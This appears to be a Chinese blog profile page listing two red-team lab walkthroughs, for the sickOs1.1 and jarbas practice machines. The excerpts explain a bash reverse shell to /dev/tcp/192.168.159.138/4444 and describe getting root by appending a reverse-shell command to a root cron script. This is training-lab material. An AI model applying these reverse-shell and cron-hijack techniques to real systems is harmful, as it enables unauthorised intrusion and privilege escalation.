- 博客(3)
- 收藏
- 关注
原创 红队笔记sickOs1.1
dev/tcp/192.168.159.138/4444:被标准输入和标准输出所指向的路径,即主机名为 192.168.159.138,端口号为 4444,建立 tcp 连接,这样一来所有的输入和输出都会显示到 192.168.159.138这台攻击机上,就达到了反弹 shell 的目的。:用于重定向标准输出的特殊符号,将输出重定向到指定的文件或设备,即 “/dev/tcp/192.168.159.138/4444”。/bin/bash:指定要执行的外部程序的路径。结果,将代理设置为3128进行尝试。
2024-10-28 18:59:05
768
原创 红队笔记jarbas靶机
本次测试先通过nmap扫描到开放端口,并进行了优先级排序,然后通过80端口的目录扫描获取到了8080端口登录所需的账号密码,然后通过创建任务执行shell命令反弹shell,但反弹的权限过低,此时发现会每五分钟会以root权限执行/etc/script/CleaningScript.sh 中的命令,因此通过追加shell命令以root权限再次反弹。注:本文中有时ip为133有时为134是因为中途出了点问题重启了一下但都是靶机ip。
2024-10-25 17:25:51
584
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅